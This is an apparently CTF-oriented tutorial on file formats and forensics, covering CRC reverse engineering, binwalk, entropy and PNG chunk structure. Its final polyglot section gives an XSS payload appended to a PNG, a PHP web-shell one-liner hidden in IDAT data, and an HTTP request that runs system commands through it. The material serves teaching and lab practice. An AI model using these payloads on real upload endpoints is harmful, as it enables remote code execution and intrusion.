If you want to understand how a file format works, you should look at documentation online about it. Often these formats are not ASCII readable so you'll want to use a hex editor, such as xxd, hexedit or hexyl.
A big collection of file formats made by Ange Albertini is the following (just scroll through until you find your format):
CRCs: Cyclic Redundancy Checks
File formats often use a Cyclic Redundancy Check (CRC) to validate if the bytes have been tampered with or corrupted slightly. See these as a checksum that combines all bytes into a small extra set of bytes that is different if you change even a single bit. These are not as strong as real hashing algorithms, but only output a few bytes. Preventing collisions is not their purpose, purely detecting accidental changes.
Because there are many different types of CRCs, a site like the following makes it easy to compare your data and output to reverse engineer exactly what algorithm was used. Then you can use this knowledge to create a correct checksum for any arbitrary data:
CRC reveng is another tool built for calculating the CRC parameters from enough samples, so it does not have to be a well-known algorithm.
Compilation
Download and extract the source code, then run make. If you run into the following error, do as it says and change the BMP_BIT and BMP_SUB values inside config.h:
Then you can install the tool using sudo ln -s "$(pwd)"/reveng /usr/bin/reveng.
Usage
Given a word length (often 8, 16 or 32), this tool can find the parameters of a CRC algorithmically. You need to provide hex strings that are followed by the CRC. Often these can be recognized by templated data (eg. lots of nulls or similar data) followed by 1, 2 or 4 random bytes which are the CRC. Take the following example:
Hexdump
52454300020000000400000005000000 D9 D1 4938 REC...............I852454300020000000600000007000000 2F 1E 65 D0 REC............./.e.52454300020000000800000009000000 2E 7B 3025 REC..............{0%5245430002000000 0A 000000 0B 000000 D8 B4 1C CD REC.................
It looks like the last 4 bytes of each row are pretty random. To crack the exact algorithm used, we simply provide them to reveng as hex strings and the 32-bit length we guessed52 45 43 00 02 00 00 00 04 00 00 00 05 00 00 00 D9 D1 49 38 REC...............I8
It found all parameters, and the preset name "CRC-32/ISO-HDLC". This is a well-known variant. Next, we can predict the CRC for any sequence of data by specifying a preset:
This correctly computes the hash for the first string! If the tool did not find a named preset, you can still give it the raw parameters to achieve the same result:
Sometimes when data tries to be hidden inside another file, it is just pasted right into the host file. Meaning that the bytes of the secret file are just somewhere in the other file. Using binwalk you can check for known file signatures in a file to see if it embeds something.
Using the following command you can also recursively extract all of these into a .extracted folder:
$ binwalk -eM file.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 TRX firmware header, little endian, image size: 37883904 bytes, CRC32: 0x95C5DF32, flags: 0x1, version: 1, header size: 28 bytes, loader offset: 0x1C, linux kernel offset: 0x0, rootfs offset: 0x0
28 0x1C uImage header, header size: 64 bytes, header CRC: 0x780C2742, created: 2018-10-10 02:12:20, image size: 2150281 bytes, Data Address: 0x8000, Entry Point: 0x8000, data CRC: 0xA097CFEA, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "DD-WRT"
92 0x5C Linux kernel ARM boot executable zImage (little-endian)
2460 0x99C device tree image (dtb)
23432 0x5B88 xz compressed data
23776 0x5CE0 xz compressed data
2117484 0x204F6C device tree image (dtb)
3145756 0x30001C UBI erase count header, version: 1, EC: 0x0, VID header offset: 0x800, data offset: 0x1000
$ binwalk --dd='.*' file.bin # Another way to extract all file signatures
A common false positive with PNGs is Zlib compressed data. This is because PNG uses Zlib for compression in its own file format, so it is recognized by binwalk. But very often this compressed data just covers the entire file
You can also use binwalk to understand an unknown file better, by looking at the entropy for example. Entropy is how random a certain sequence of bytes is. Simple ASCII text is pretty predictable and stays within about the same range, so the entropy would be low. But for completely random/encrypted bytes the entropy should be really high, close to 1. You can get a graph of the entropy of the file using the -E flag:
$ binwalk -E file.bin
This can give a good idea about what parts of a file you could look at.
PNG
Image files like PNG can have a lot of hidden info. It's a relatively complex file format with a lot of room for secrets.
A quick check you can do to see if it is a completely valid PNG file is using pngcheck:
$ pngcheck -h
Test PNG, JNG or MNG image files for corruption, and print size/type info.
Usage: pngcheck [-7cfpqtv] file.{png|jng|mng} [file2.{png|jng|mng} [...]]
or: ... | pngcheck [-7cfpqstvx]
or: pngcheck [-7cfpqstvx] file-containing-PNGs...
Options:
-7 print contents of tEXt chunks, escape chars >=128 (for 7-bit terminals)
-c colorize output (for ANSI terminals)
-f force continuation even after major errors
-p print contents of PLTE, tRNS, hIST, sPLT and PPLT (can be used with -q)
-q test quietly (output only errors)
-s search for PNGs within another file
-t print contents of tEXt chunks (can be used with -q)
-v test verbosely (print most chunk data)
-x search for PNGs within another file and extract them when found
$ pngcheck image.png
OK: image.png (1920x1080, 32-bit RGB+alpha, non-interlaced, 96.6%).
PNG files consist of chunks of bytes that tell something about the image. The most common one is IDAT which contains the pixel data of the image. An image always ends with IEND and 4 checksum bytes (every chunk has the checksum).
You might see custom chunks being used to embed data, or data appended to the end, after IEND.
Embed Raw Data (Polyglots)
You might find some applications where you are allowed to upload files and find that you can either give them a .php extension to create a web shell or make the Content-Type: text/html to render tags inside the raw bytes for Cross-Site Scripting (XSS). In either case, this application might validate or even transform your image in a way that does not preserve all the original bytes, breaking your payload.
While you might be able to include metadata with tools like exiftool, these might be stripped by the server upon saving your file:
Another trick is simply appending data to the end of the file. This would not pass as a valid PNG anymore, but could survive on the server:
$ echo '<svg/onload=alert()>' >> example.png
$ hd example.png
...
000009d0 5a b3 07 54 ac 7b 51 fb 78 a7 ea 00 00 00 00 49 |Z..T.{Q.x......I|
000009e0 45 4e 44 ae 42 60 82 3c 73 76 67 2f 6f 6e 6c 6f |END.B`.<svg/onlo|
000009f0 61 64 3d 61 6c 65 72 74 28 29 3e 0a |ad=alert()>.|
000009fc
Lastly, there is a technique more resistant to transformation by using the IDAT chunks. These normally include compressed DEFLATE data representing the pixels themselves, but this process can be reversed to obtain a string of pixels that compress into a payload like:
<?=$_GET[0]($_POST[1]);?>
If the payload above is executed, you can provide a function you want to call like system() as the query parameter 0, and an argument you want to give the function in a 1 body parameter.
POST /shell.php?0=system HTTP/1.1...Content-Type:application/x-www-form-urlencodedContent-Length:41=id
The process of creating these and a few example payloads are described in the following post, which also shows an XSS payload with the same idea: